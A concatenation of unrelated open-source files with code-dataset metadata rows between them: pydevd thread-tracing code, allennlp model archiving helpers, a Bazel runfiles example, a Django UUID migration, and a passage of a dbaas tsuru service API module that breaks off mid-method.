from _pydevd_bundle.pydevd_additional_thread_info import PyDBAdditionalThreadInfo
from _pydevd_bundle.pydevd_frame import PyDBFrame
# ENDIF
# Module-level aliases: bound once so the (very hot) tracing path uses fast
# global lookups instead of repeated attribute lookups.
threadingCurrentThread = threading.currentThread

get_file_type = DONT_TRACE.get

# IFDEF CYTHON -- DONT EDIT THIS FILE (it is automatically generated)
# cdef dict global_cache_skips
# cdef dict global_cache_frame_skips
# ELSE
# ENDIF

# Cache where we should keep that we completely skipped entering some context.
# It needs to be invalidated when:
# - Breakpoints are changed
# It can be used when running regularly (without step over/step in/step return)
global_cache_skips = {}
global_cache_frame_skips = {}
def trace_dispatch(py_db, frame, event, arg):
    # Entry point installed via sys.settrace: lazily creates the per-thread
    # debug info and a ThreadTracer, installs the tracer as the thread's
    # trace function, and delegates this first event to it.
    t = threadingCurrentThread()
    if getattr(t, 'pydev_do_not_trace', None):
        # Thread explicitly opted out of tracing (e.g. pydevd's own threads).
        return None
    try:
        additional_info = t.additional_info
        if additional_info is None:
            raise AttributeError()
    except:
        # No (valid) per-thread info yet: create it on first use.
        additional_info = t.additional_info = PyDBAdditionalThreadInfo()
    thread_tracer = ThreadTracer((py_db, t, additional_info, global_cache_skips, global_cache_frame_skips))
    # IFDEF CYTHON
    # t._tracer = thread_tracer # Hack for cython to keep it alive while the thread is alive (just the method in the SetTrace is not enough).
    # ELSE
    # ENDIF
    SetTrace(thread_tracer.__call__)
    return thread_tracer.__call__(frame, event, arg)
# IFDEF CYTHON
# cdef class SafeCallWrapper:
# cdef method_object
# def __init__(self, method_object):
# self.method_object = method_object
# def __call__(self, *args):
# #Cannot use 'self' once inside the delegate call since we are borrowing the self reference f_trace field
# #in the frame, and that reference might get destroyed by set trace on frame and parents
# cdef PyObject* method_obj = <PyObject*> self.method_object
# Py_INCREF(<object>method_obj)
# ret = (<object>method_obj)(*args)
# Py_XDECREF (method_obj)
# return SafeCallWrapper(ret) if ret is not None else None
# cdef class ThreadTracer:
# cdef public tuple _args;
# def __init__(self, tuple args):
# self._args = args
# ELSE
class ThreadTracer:
    # Per-thread trace callback. NOTE: this file states it is automatically
    # generated; the IFDEF CYTHON comment blocks are load-bearing for the
    # Cython build and must be kept in sync with any change here.

    def __init__(self, args):
        # args: (py_db, thread, additional_info, cache_skips, frame_skips_cache)
        # as assembled by trace_dispatch().
        self._args = args
# ENDIF

    def __call__(self, frame, event, arg):
        ''' This is the callback used when we enter some context in the debugger.

        We also decorate the thread we are in with info about the debugging.
        The attributes added are:
            pydev_state
            pydev_step_stop
            pydev_step_cmd
            pydev_notify_kill

        :param PyDB py_db:
            This is the global debugger (this method should actually be added as a method to it).
        '''
        # IFDEF CYTHON
        # cdef str filename;
        # cdef str base;
        # cdef int pydev_step_cmd;
        # cdef tuple cache_key;
        # cdef dict cache_skips;
        # cdef bint is_stepping;
        # cdef tuple abs_path_real_path_and_base;
        # cdef PyDBAdditionalThreadInfo additional_info;
        # ENDIF
        # print('ENTER: trace_dispatch', frame.f_code.co_filename, frame.f_lineno, event, frame.f_code.co_name)
        py_db, t, additional_info, cache_skips, frame_skips_cache = self._args
        pydev_step_cmd = additional_info.pydev_step_cmd
        is_stepping = pydev_step_cmd != -1
        try:
            if py_db._finish_debugging_session:
                if not py_db._termination_event_set:
                    # that was not working very well because jython gave some socket errors
                    try:
                        if py_db.output_checker is None:
                            kill_all_pydev_threads()
                    except:
                        traceback.print_exc()
                    py_db._termination_event_set = True
                return None

            # if thread is not alive, cancel trace_dispatch processing
            if not is_thread_alive(t):
                py_db._process_thread_not_alive(get_thread_id(t))
                return None  # suspend tracing

            try:
                # Make fast path faster!
                abs_path_real_path_and_base = NORM_PATHS_AND_BASE_CONTAINER[frame.f_code.co_filename]
            except:
                abs_path_real_path_and_base = get_abs_path_real_path_and_base_from_frame(frame)

            if py_db.thread_analyser is not None:
                py_db.thread_analyser.log_event(frame)

            if py_db.asyncio_analyser is not None:
                py_db.asyncio_analyser.log_event(frame)

            filename = abs_path_real_path_and_base[1]

            # Note: it's important that the context name is also given because we may hit something once
            # in the global context and another in the local context.
            cache_key = (frame.f_lineno, frame.f_code.co_name, filename)
            if not is_stepping and cache_key in cache_skips:
                # print('skipped: trace_dispatch (cache hit)', cache_key, frame.f_lineno, event, frame.f_code.co_name)
                return None

            file_type = get_file_type(abs_path_real_path_and_base[-1])  # we don't want to debug threading or anything related to pydevd

            if file_type is not None:
                if file_type == 1:  # inlining LIB_FILE = 1
                    if py_db.not_in_scope(filename):
                        # print('skipped: trace_dispatch (not in scope)', abs_path_real_path_and_base[-1], frame.f_lineno, event, frame.f_code.co_name, file_type)
                        cache_skips[cache_key] = 1
                        return None
                else:
                    # print('skipped: trace_dispatch', abs_path_real_path_and_base[-1], frame.f_lineno, event, frame.f_code.co_name, file_type)
                    cache_skips[cache_key] = 1
                    return None

            if is_stepping:
                if py_db.is_filter_enabled and py_db.is_ignored_by_filters(filename):
                    # ignore files matching stepping filters
                    return None
                if py_db.is_filter_libraries and py_db.not_in_scope(filename):
                    # ignore library files while stepping
                    return None

            # print('trace_dispatch', base, frame.f_lineno, event, frame.f_code.co_name, file_type)
            if additional_info.is_tracing:
                return None  # we don't wan't to trace code invoked from pydevd_frame.trace_dispatch

            # Just create PyDBFrame directly (removed support for Python versions < 2.5, which required keeping a weak
            # reference to the frame).
            ret = PyDBFrame((py_db, filename, additional_info, t, frame_skips_cache, (frame.f_code.co_name, frame.f_code.co_firstlineno, filename))).trace_dispatch(frame, event, arg)
            if ret is None:
                cache_skips[cache_key] = 1
                return None

            # IFDEF CYTHON
            # return SafeCallWrapper(ret)
            # ELSE
            return ret
            # ENDIF

        except SystemExit:
            return None

        except Exception:
            if py_db._finish_debugging_session:
                return None  # Don't log errors when we're shutting down.
            # Log it
            try:
                if traceback is not None:
                    # This can actually happen during the interpreter shutdown in Python 2.7
                    traceback.print_exc()
            except:
                # Error logging? We're really in the interpreter shutdown...
                # (https://github.com/fabioz/PyDev.Debugger/issues/8)
                pass
            return None
| 41.705 | 182 | 0.65208 |
ace76078d2b66cc99917d53b919dd8ad29ede387 | 7,462 | py | Python | allennlp/models/archival.py | jspreston/allennlp | 2d5f24bd94ba229741a1a17e09b540a374447c77 | [
"Apache-2.0"
] | null | null | null | allennlp/models/archival.py | jspreston/allennlp | 2d5f24bd94ba229741a1a17e09b540a374447c77 | [
"Apache-2.0"
] | null | null | null | allennlp/models/archival.py | jspreston/allennlp | 2d5f24bd94ba229741a1a17e09b540a374447c77 | [
"Apache-2.0"
] | null | null | null | """
Helper functions for archiving models and restoring archived models.
"""
from os import PathLike
from typing import NamedTuple, Union
import logging
import os
import tempfile
import tarfile
import shutil
from torch.nn import Module
from allennlp.common.checks import ConfigurationError
from allennlp.common.file_utils import cached_path
from allennlp.common.params import Params
from allennlp.models.model import Model, _DEFAULT_WEIGHTS
# Module-level logger for archival progress and error messages.
logger = logging.getLogger(__name__)
class Archive(NamedTuple):
    """A trained model paired with the experiment config that produced it."""

    model: Model
    config: Params

    def extract_module(self, path: str, freeze: bool = True) -> Module:
        """
        Load a single submodule of the archived model, addressed by its
        dotted module path (e.g. ``"_textfield_embedder.token_embedder_tokens"``).

        This also backs FromParams-based construction: a ``"_pretrained"``
        params block with ``archive_file``, ``path`` and ``freeze`` keys is
        resolved through this method instead of building the module from
        scratch. Beware that a model initializer run afterwards can
        re-initialize (and thus wipe) the transferred weights if its
        initializer regexes match them; either exclude them from the regex
        or add a ``"prevent"`` initializer for the transferred module.

        # Parameters

        path : `str`, required
            Dotted path of the target module inside the archived model.
        freeze : `bool`, optional (default=`True`)
            If true, the returned module's parameters have
            ``requires_grad`` disabled.
        """
        named_modules = dict(self.model.named_modules())
        target = named_modules.get(path)
        if not target:
            raise ConfigurationError(
                f"You asked to transfer module at path {path} from "
                f"the model {type(self.model)}. But it's not present."
            )
        if not isinstance(target, Module):
            raise ConfigurationError(
                f"The transferred object from model {type(self.model)} at path "
                f"{path} is not a PyTorch Module."
            )
        for param in target.parameters():  # type: ignore
            param.requires_grad_(not freeze)
        return target
# We archive a model by creating a tar.gz file with its weights, config, and vocabulary.
#
# These constants are the *known names* under which we archive them.
# (load_archive relies on finding exactly these entry names in the tarball.)
CONFIG_NAME = "config.json"
_WEIGHTS_NAME = "weights.th"
def archive_model(
    serialization_dir: Union[str, PathLike],
    weights: str = _DEFAULT_WEIGHTS,
    archive_path: Union[str, PathLike] = None,
) -> None:
    """
    Archive the model weights, its training configuration, and its vocabulary to `model.tar.gz`.

    # Parameters

    serialization_dir : `str`
        The directory where the weights and vocabulary are written out.
    weights : `str`, optional (default=`_DEFAULT_WEIGHTS`)
        Which weights file to include in the archive. The default is `best.th`.
    archive_path : `str`, optional, (default = `None`)
        A full path to serialize the model to. The default is "model.tar.gz" inside the
        serialization_dir. If you pass a directory here, we'll serialize the model
        to "model.tar.gz" inside the directory.
    """
    weights_file = os.path.join(serialization_dir, weights)
    if not os.path.exists(weights_file):
        logger.error("weights file %s does not exist, unable to archive model", weights_file)
        return

    config_file = os.path.join(serialization_dir, CONFIG_NAME)
    if not os.path.exists(config_file):
        logger.error("config file %s does not exist, unable to archive model", config_file)
        # Bug fix: previously execution fell through and `archive.add(config_file)`
        # below raised on the missing file; bail out like the missing-weights case.
        return

    if archive_path is not None:
        archive_file = archive_path
        # A directory target gets the conventional archive name inside it.
        if os.path.isdir(archive_file):
            archive_file = os.path.join(archive_file, "model.tar.gz")
    else:
        archive_file = os.path.join(serialization_dir, "model.tar.gz")

    logger.info("archiving weights and vocabulary to %s", archive_file)
    # Store entries under the fixed names that load_archive() expects.
    with tarfile.open(archive_file, "w:gz") as archive:
        archive.add(config_file, arcname=CONFIG_NAME)
        archive.add(weights_file, arcname=_WEIGHTS_NAME)
        archive.add(os.path.join(serialization_dir, "vocabulary"), arcname="vocabulary")
def load_archive(
    archive_file: str,
    cuda_device: int = -1,
    overrides: str = "",
    weights_file: str = None,
) -> Archive:
    """
    Instantiates an Archive from an archived `tar.gz` file.

    # Parameters

    archive_file : `str`
        The archive file to load the model from.
    cuda_device : `int`, optional (default = `-1`)
        If `cuda_device` is >= 0, the model will be loaded onto the
        corresponding GPU. Otherwise it will be loaded onto the CPU.
    overrides : `str`, optional (default = `""`)
        JSON overrides to apply to the unarchived `Params` object.
    weights_file : `str`, optional (default = `None`)
        The weights file to use. If unspecified, weights.th in the archive_file will be used.
    """
    # redirect to the cache, if necessary
    resolved_archive_file = cached_path(archive_file)

    if resolved_archive_file == archive_file:
        logger.info(f"loading archive file {archive_file}")
    else:
        logger.info(f"loading archive file {archive_file} from cache at {resolved_archive_file}")

    tempdir = None
    try:
        if os.path.isdir(resolved_archive_file):
            # Already an unpacked serialization directory: use it in place.
            serialization_dir = resolved_archive_file
        else:
            # Extract archive to temp dir
            tempdir = tempfile.mkdtemp()
            logger.info(f"extracting archive file {resolved_archive_file} to temp dir {tempdir}")
            with tarfile.open(resolved_archive_file, "r:gz") as archive:
                archive.extractall(tempdir)
            serialization_dir = tempdir

        # Load config
        config = Params.from_file(os.path.join(serialization_dir, CONFIG_NAME), overrides)

        if weights_file:
            weights_path = weights_file
        else:
            weights_path = os.path.join(serialization_dir, _WEIGHTS_NAME)
            # Fallback for serialization directories.
            if not os.path.exists(weights_path):
                weights_path = os.path.join(serialization_dir, _DEFAULT_WEIGHTS)

        # Instantiate model. Use a duplicate of the config, as it will get consumed.
        model = Model.load(
            config.duplicate(),
            weights_file=weights_path,
            serialization_dir=serialization_dir,
            cuda_device=cuda_device,
        )
    finally:
        # Clean up the extraction dir even if model loading failed.
        if tempdir is not None:
            logger.info(f"removing temporary unarchived model dir at {tempdir}")
            shutil.rmtree(tempdir, ignore_errors=True)

    return Archive(model=model, config=config)
| 37.878173 | 101 | 0.657733 |
ace76096f88d57753937f1fecb8a00be34544649 | 3,184 | bzl | Python | rules/runfiles/complex_tool.bzl | aiuto/bazel_examples | b3df8fc2601ac78e8208c63b9f5d74c599857b2f | [
"Apache-2.0"
] | null | null | null | rules/runfiles/complex_tool.bzl | aiuto/bazel_examples | b3df8fc2601ac78e8208c63b9f5d74c599857b2f | [
"Apache-2.0"
] | null | null | null | rules/runfiles/complex_tool.bzl | aiuto/bazel_examples | b3df8fc2601ac78e8208c63b9f5d74c599857b2f | [
"Apache-2.0"
] | null | null | null | """Create a complex tool with runfiles and a rule which uses it.
A tool (executable used for action registration) may depend on another
tool with its own runfiles. This example demonstrates this scenario."""
def _sub_tool_impl(ctx):
    # Implementation for sub_tool: writes a small shell script that cats
    # runfiles/data.txt into the file named by its first argument.
    #
    # Since this tool may be used by another tool, it must support accepting
    # a different runfiles directory root. The runfiles directory is always
    # adjacent to the *root* tool being run, which may not be this tool.
    # (In this case, this is done by environment variable RUNFILES_DIR.)
    command = """
if [[ -z "${RUNFILES_DIR}" ]]; then
  RUNFILES_DIR=${0}.runfiles
fi
cat ${RUNFILES_DIR}/examples/runfiles/data.txt > $1"""

    # Using root_symlinks or symlinks for a tool is very brittle if the
    # tool may be used by another tool; there will be a collision when merging
    # runfiles if the other tool defines a symlink of the same name as one
    # defined by this rule.
    ctx.actions.write(
        output = ctx.outputs.executable,
        content = command,
        is_executable = True,
    )

    # Subtool depends on RUNFILES_DIR/<workspace_name>/runfiles/data.txt.
    return [DefaultInfo(
        runfiles = ctx.runfiles(files = [ctx.files._data[0]]),
    )]
# Executable rule producing the sub tool; the implicit _data attribute pins
# the data.txt runfile the generated script reads.
sub_tool = rule(
    implementation = _sub_tool_impl,
    executable = True,
    attrs = {
        "command": attr.string(),
        "_data": attr.label(
            allow_files = True,
            default = ":data.txt",
        ),
    },
)
def _complex_tool_impl(ctx):
    # Implementation for complex_tool: a tool that itself invokes sub_tool,
    # demonstrating runfiles merging across tool dependencies.
    my_runfiles = ctx.runfiles(files = [ctx.files._data[0]])
    # Use runfiles.merge to merge the runfiles of both tools. All runfiles will
    # be rooted under the runfiles directory owned by this rule, however.
    my_runfiles = my_runfiles.merge(ctx.attr._subtool[DefaultInfo].default_runfiles)

    # Thus the example directory structure is:
    # runfiles/complex_tool (executable)
    # runfiles/complex_tool.runfiles/
    #     <workspace_name>/
    #         runfiles/
    #             complex_tool_data.txt
    #             data.txt
    #             subtool
    runfiles_relative_tool_path = ctx.workspace_name + "/" + ctx.attr._subtool[DefaultInfo].files_to_run.executable.short_path

    # This tool forwards its runfiles directory via the RUNFILES_DIR to the
    # subtool, otherwise the subtool would be looking to $0.runfiles, which does
    # not exist.
    command = ("#!/bin/bash\nexport RUNFILES_DIR=\"$0.runfiles\" && " +
               "${RUNFILES_DIR}/%s $1 && cat ${RUNFILES_DIR}/examples/%s >> $1") % (
        runfiles_relative_tool_path,
        ctx.files._data[0].short_path,
    )

    ctx.actions.write(
        output = ctx.outputs.executable,
        content = command,
        is_executable = True,
    )
    return [DefaultInfo(
        runfiles = my_runfiles,
    )]
# Executable rule producing the complex tool; depends on the sub_tool target
# (whose runfiles get merged in) and on its own data file.
complex_tool = rule(
    implementation = _complex_tool_impl,
    executable = True,
    attrs = {
        "command": attr.string(),
        "_subtool": attr.label(
            allow_files = True,
            default = ":subtool",
        ),
        "_data": attr.label(
            allow_files = True,
            default = ":complex_tool_data.txt",
        ),
    },
)
| 32.824742 | 126 | 0.637563 |
ace7616a6c6c9559123cf1371c71a3fdb2617dce | 1,131 | py | Python | koku/reporting/migrations/0158_auto_20201214_1757.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 2 | 2022-01-12T03:42:39.000Z | 2022-01-12T03:42:40.000Z | koku/reporting/migrations/0158_auto_20201214_1757.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0158_auto_20201214_1757.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 1 | 2021-07-21T09:33:59.000Z | 2021-07-21T09:33:59.000Z | # Generated by Django 3.1.3 on 2020-12-14 17:57
import uuid
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
    """Make ``uuid`` the primary key on the four OCP-on-cloud daily-summary
    tables (identical schema state to the hand-written original)."""

    dependencies = [("reporting", "0157_auto_20201214_1757")]

    # The same AlterField applies to four models, so the operations are
    # generated from the model-name list instead of repeating the literal.
    operations = [
        migrations.AlterField(
            model_name=summary_model,
            name="uuid",
            field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
        )
        for summary_model in (
            "ocpawscostlineitemdailysummary",
            "ocpawscostlineitemprojectdailysummary",
            "ocpazurecostlineitemdailysummary",
            "ocpazurecostlineitemprojectdailysummary",
        )
    ]
| 33.264706 | 90 | 0.648099 |
ace761e9e0971b90268843f6ac15306333f05e8c | 28,004 | py | Python | dbaas/tsuru/views.py | TiagoDanin-Forks/database-as-a-service | bc43e5638cda459488e6d77d87c16f5d65222e57 | [
"BSD-3-Clause"
] | 1 | 2021-08-03T09:50:20.000Z | 2021-08-03T09:50:20.000Z | dbaas/tsuru/views.py | nouraellm/database-as-a-service | 5e655c9347bea991b7218a01549f5e44f161d7be | [
"BSD-3-Clause"
] | null | null | null | dbaas/tsuru/views.py | nouraellm/database-as-a-service | 5e655c9347bea991b7218a01549f5e44f161d7be | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import logging
import requests
from slugify import slugify
from django.core.exceptions import MultipleObjectsReturned
from django.db.models import Q
from django.core.exceptions import ObjectDoesNotExist
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.renderers import JSONRenderer, JSONPRenderer
from rest_framework.response import Response
from networkapiclient import Ip, Network
from django.utils.functional import cached_property
from util import get_credentials_for
from util.decorators import REDIS_CLIENT
from util import simple_health_check
from physical.models import Plan, Environment, PlanNotFound, Pool
from account.models import AccountUser, Team
from notification.models import TaskHistory
from notification.tasks import TaskRegister
from workflow.steps.util.base import ACLFromHellClient
from maintenance.models import DatabaseCreate
from dbaas_credentials.models import CredentialType
from logical.validators import database_name_evironment_constraint
from logical.models import Database
from logical.forms import DatabaseForm
from dbaas.middleware import UserMiddleware
LOG = logging.getLogger(__name__)

# Database names must start with a lowercase letter and contain only
# lowercase letters, digits and underscores (enforced by ServiceAdd).
DATABASE_NAME_REGEX = re.compile('^[a-z][a-z0-9_]+$')
class ListPlans(APIView):
    """List the active CloudStack plans available on the URL's environment."""

    renderer_classes = (JSONRenderer, JSONPRenderer)
    model = Plan

    def get(self, request, format=None):
        environment_name = get_url_env(request)
        active_plans = Plan.objects.filter(
            environments__name=environment_name
        ).values(
            'name', 'description', 'environments__name'
        ).extra(
            where=['is_active=True', 'provider={}'.format(Plan.CLOUDSTACK)]
        )
        return Response(get_plans_dict(active_plans))
class GetServiceStatus(APIView):
    # Tsuru status probe: maps the database's health to an HTTP status code.
    renderer_classes = (JSONRenderer, JSONPRenderer)
    model = Database

    def get(self, request, database_name, format=None):
        env = get_url_env(request)
        LOG.info("Database name {}. Environment {}".format(
            database_name, env)
        )
        try:
            database = get_database(database_name, env)
            database_status = database.status
        except IndexError as e:
            # get_database indexes into the queryset result; IndexError
            # means no such database — treated as status 0 (unknown/dead).
            database_status = 0
            LOG.warn(
                "There is not a database with this {} name on {}. {}".format(
                    database_name, env, e
                )
            )

        LOG.info("Status = {}".format(database_status))
        # A RUNNING task mentioning this database/env means work is still in
        # progress, which downgrades DEAD to "pending" below.
        task = TaskHistory.objects.filter(
            Q(arguments__contains=database_name) &
            Q(arguments__contains=env), task_status="RUNNING"
        ).order_by("created_at")
        LOG.info("Task {}".format(task))

        # Mapping: ALIVE -> 204 (up), DEAD with no running task -> 500
        # (failed), anything else (including DEAD with work pending) -> 202.
        if database_status == Database.ALIVE:
            database_status = status.HTTP_204_NO_CONTENT
        elif database_status == Database.DEAD and not task:
            database_status = status.HTTP_500_INTERNAL_SERVER_ERROR
        else:
            database_status = status.HTTP_202_ACCEPTED

        return Response(status=database_status)
class GetServiceInfo(APIView):
    """Return tsuru service-instance info: currently the used size in bytes.

    An unknown database yields an empty payload rather than an error.
    """

    renderer_classes = (JSONRenderer, JSONPRenderer)
    model = Database

    def get(self, request, database_name, format=None):
        environment = get_url_env(request)
        try:
            found = get_database(database_name, environment)
            info = {'used_size_in_bytes': str(found.used_size_in_bytes)}
        except IndexError as e:
            info = {}
            LOG.warn(
                "There is not a database {} on {}. {}".format(
                    database_name, environment, e
                )
            )
        LOG.info("Info = {}".format(info))
        return Response(info)
class ServiceAppBind(APIView):
    # Tsuru app bind/unbind: opens ACLs from the app to the database hosts
    # and returns the connection environment variables for the app.
    renderer_classes = (JSONRenderer, JSONPRenderer)
    model = Database

    def add_acl_for_hosts(self, database, app_name):
        # Open an ACL from the tsuru app to every host of the database's
        # infra (plus the VIP, if the topology has one). Returns None on
        # success or an error Response on the first failure.
        infra = database.infra
        hosts = infra.hosts

        acl_from_hell_client = ACLFromHellClient(database.environment)
        for host in hosts:
            resp = acl_from_hell_client.add_acl(
                database,
                app_name,
                host.hostname
            )
            if not resp.ok:
                msg = "Error for {} on {}.".format(
                    database.name, database.environment.name
                )
                return log_and_response(
                    msg=msg, e=resp.content,
                    http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
                )

        acl_from_hell_client.add_acl_for_vip_if_needed(database, app_name)
        return None

    @staticmethod
    def _handle_app_name(app_name):
        # Tsuru may send the app name as a one-element list; normalize it.
        return app_name[0] if isinstance(app_name, list) else app_name

    def post(self, request, database_name, format=None):
        """This method binds a App to a database through tsuru."""
        env = get_url_env(request)
        data = request.DATA
        LOG.debug("Tsuru Bind App POST Request DATA {}".format(data))

        response = check_database_status(database_name, env)
        if not isinstance(response, self.model):
            # check_database_status returned an error Response; pass it on.
            return response
        database = response

        self.add_acl_for_hosts(
            database,
            self._handle_app_name(data['app-name'])
        )

        hosts, ports = database.infra.get_driver().get_dns_port()
        ports = str(ports)
        if database.databaseinfra.engine.name == 'redis':
            # Redis: credentials are the infra password embedded in the DNS
            # endpoint; sentinel topologies get a different variable set.
            redis_password = database.databaseinfra.password
            endpoint = database.get_endpoint_dns().replace(
                '<password>', redis_password
            )
            env_vars = {
                "DBAAS_REDIS_PASSWORD": redis_password,
                "DBAAS_REDIS_ENDPOINT": endpoint,
                "DBAAS_REDIS_HOST": hosts,
                "DBAAS_REDIS_PORT": ports
            }
            if 'redis_sentinel' in database.infra.get_driver().topology_name():
                env_vars = {
                    "DBAAS_SENTINEL_PASSWORD": redis_password,
                    "DBAAS_SENTINEL_ENDPOINT": endpoint,
                    "DBAAS_SENTINEL_ENDPOINT_SIMPLE": database.get_endpoint_dns_simple(),  # noqa
                    "DBAAS_SENTINEL_SERVICE_NAME": database.databaseinfra.name,
                    "DBAAS_SENTINEL_HOSTS": hosts,
                    "DBAAS_SENTINEL_PORT": ports
                }
        else:
            # Non-redis engines: use the Owner credential (or any credential
            # as a fallback) to fill user/password into the endpoint.
            try:
                credential = (
                    database.credentials.filter(privileges='Owner')
                    or database.credentials.all()
                )[0]
            except IndexError as e:
                msg = ("Database {} in env {} does not have "
                       "credentials.").format(
                    database_name, env
                )
                return log_and_response(
                    msg=msg, e=e,
                    http_status=status.HTTP_500_INTERNAL_SERVER_ERROR
                )

            endpoint = database.get_endpoint_dns().replace(
                '<user>:<password>', "{}:{}".format(
                    credential.user, credential.password
                )
            )

            # Engine-specific variable prefix inferred from the endpoint scheme.
            kind = ''
            if endpoint.startswith('mysql'):
                kind = 'MYSQL_'
            if endpoint.startswith('mongodb'):
                kind = 'MONGODB_'

            env_vars = {
                "DBAAS_{}USER".format(kind): credential.user,
                "DBAAS_{}PASSWORD".format(kind): credential.password,
                "DBAAS_{}ENDPOINT".format(kind): endpoint,
                "DBAAS_{}HOSTS".format(kind): hosts,
                "DBAAS_{}PORT".format(kind): ports
            }

        return Response(env_vars, status.HTTP_201_CREATED)

    def delete(self, request, database_name, format=None):
        """This method unbinds a App to a database through tsuru."""
        env = get_url_env(request)
        data = request.DATA
        LOG.debug("Tsuru Unbind App DELETE Request DATA {}".format(data))

        response = check_database_status(database_name, env)
        if not isinstance(response, Database):
            return response
        database = response

        acl_from_hell_client = ACLFromHellClient(database.environment)
        acl_from_hell_client.remove_acl(
            database,
            self._handle_app_name(data['app-name'])
        )
        return Response(status=status.HTTP_204_NO_CONTENT)
class ServiceUnitBind(APIView):
    """Tsuru unit bind/unbind endpoints.

    Binding is handled per app (see ServiceAppBind); individual units need
    no extra work, so both verbs simply acknowledge the request.
    """

    renderer_classes = (JSONRenderer, JSONPRenderer)
    model = Database

    def post(self, request, database_name, format=None):
        # Nothing to do per unit; acknowledge with 201 and no body.
        return Response(None, status.HTTP_201_CREATED)

    def delete(self, request, database_name, format=None):
        # Bug fix: the status code must go in the `status` keyword.
        # Passing it positionally made it the response *data*, so tsuru
        # received HTTP 200 with the body "204" instead of a real 204
        # (ServiceAppBind.delete already uses the keyword form).
        return Response(status=status.HTTP_204_NO_CONTENT)
class ServiceAdd(APIView):
    # Tsuru service-instance creation endpoint. Validates the request
    # payload (and, for Kubernetes environments, the tsuru pool headers),
    # then registers an asynchronous database-create task.
    renderer_classes = (JSONRenderer, JSONPRenderer)
    # Payload keys that must be present and non-empty.
    required_params = ('description', 'plan', 'user', 'name', 'team')
    # Payload keys whose values are looked up as dbaas objects
    # (via the matching dbaas_<name> property).
    search_metadata_params = ('plan', 'user', 'team')
    model = Database
    tsuru_pool_name_header = 'HTTP_X_TSURU_POOL_NAME'
    tsuru_pool_endpoint_header = 'HTTP_X_TSURU_CLUSTER_ADDRESSES'

    def __init__(self, *args, **kw):
        super(ServiceAdd, self).__init__(*args, **kw)
        # Extra kwargs forwarded to TaskRegister.database_create
        # (e.g. the resolved pool for Kubernetes environments).
        self.extra_params = {}

    @cached_property
    def data(self):
        # Request payload (cached; several validators read it).
        return self.request.DATA

    @property
    def description_param(self):
        return self.data.get('description')

    @property
    def name_param(self):
        return self.data.get('name')

    @property
    def user_param(self):
        return self.data.get('user')

    @property
    def dbaas_user(self):
        # May raise DoesNotExist / MultipleObjectsReturned; validators catch it.
        return AccountUser.objects.get(email=self.user_param)

    @property
    def team_param(self):
        return self.data.get('team')

    @property
    def dbaas_team(self):
        return Team.objects.get(name=self.team_param)

    @property
    def env_param(self):
        # Environment name comes from the request URL, not the payload.
        return get_url_env(self.request)

    @property
    def env(self):
        return Environment.objects.get(name=self.env_param)

    @property
    def is_k8s_env(self):
        k8s_envs = Environment.k8s_envs()
        return self.env_param in k8s_envs

    @property
    def plan_param(self):
        return self.data.get('plan')

    @cached_property
    def dbaas_plan(self):
        # Resolve the tsuru plan name (which is the slugified
        # "<plan>-<environment>" built by get_plans_dict) back to a Plan.
        hard_plans = Plan.objects.values(
            'name', 'description', 'pk', 'environments__name'
        ).extra(
            where=['is_active=True', 'provider={}'.format(Plan.CLOUDSTACK)]
        )
        plans = get_plans_dict(hard_plans)
        plan = [splan for splan in plans if splan['name'] == self.plan_param]
        if any(plan):
            return Plan.objects.get(pk=plan[0]['pk'])
        else:
            raise PlanNotFound("Plan was not found")

    @property
    def pool_param(self):
        return self.request.META.get(self.tsuru_pool_name_header)

    @property
    def pool_endpoint_param(self):
        return self.request.META.get(self.tsuru_pool_endpoint_header)

    @property
    def dbaas_pool(self):
        return Pool.objects.get(
            cluster_endpoint=self.pool_endpoint_param
        )

    def _validate_required_params(self):
        # 400 if any required payload key is missing or empty.
        for param_name in self.required_params:
            param_value = self.data.get(param_name)
            if not param_value:
                msg = "Param {} must be provided.".format(param_name)
                return log_and_response(
                    msg=msg, http_status=status.HTTP_400_BAD_REQUEST
                )

    def _validate_search_metadata_params(self):
        """
        Search the field param on database.
        Ex. param user
        Search the username on database if does not found we return
        the error
        """
        for param_name in self.search_metadata_params:
            if param_name in self.data:
                try:
                    getattr(self, 'dbaas_{}'.format(param_name))
                except (ObjectDoesNotExist, PlanNotFound):
                    return log_and_response(
                        msg='{} <{}> was not found'.format(
                            param_name.capitalize(),
                            getattr(self, '{}_param'.format(param_name))
                        ),
                        http_status=status.HTTP_400_BAD_REQUEST
                    )

    def _validate_database(self):
        # Name format + uniqueness checks; only the last failing check's
        # message is reported (later assignments overwrite `msg`).
        msg = ''
        if DATABASE_NAME_REGEX.match(self.name_param) is None:
            msg = "Your database name must match /^[a-z][a-z0-9_]+$/ ."
        try:
            Database.objects.get(
                name=self.name_param, environment__name=self.env_param
            )
            msg = "There is already a database called {} in {}.".format(
                self.name_param, self.env
            )
        except Database.DoesNotExist:
            pass
        if database_name_evironment_constraint(self.name_param, self.env):
            msg = "{} already exists in env {}!".format(
                self.name_param, self.env_param
            )
        if msg:
            return log_and_response(
                msg=msg, http_status=status.HTTP_400_BAD_REQUEST
            )

    def _validate_user(self):
        # Existence is already covered by _validate_search_metadata_params;
        # here only the ambiguous-email case is reported.
        try:
            AccountUser.objects.get(email=self.user_param)
        except MultipleObjectsReturned as e:
            msg = "There are multiple user for {} email.".format(
                self.user_param
            )
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_400_BAD_REQUEST
            )

    def _validate_team(self):
        # The requesting user must belong to the target team.
        try:
            self.dbaas_user.team_set.get(name=self.team_param)
        except ObjectDoesNotExist as e:
            msg = "The user is not on {} team.".format(self.team_param)
            return log_and_response(
                msg=msg, e=e, http_status=status.HTTP_400_BAD_REQUEST
            )

    def _validate_env(self):
        try:
            self.env
        except ObjectDoesNotExist:
            msg = "Environment was not found"
            return log_and_response(
                msg=msg, http_status=status.HTTP_400_BAD_REQUEST
            )

    def _validate_database_alocation(self):
        # Enforce the team's per-environment database quota.
        databases_used_by_team = self.dbaas_team.count_databases_in_use(
            environment=self.env
        )
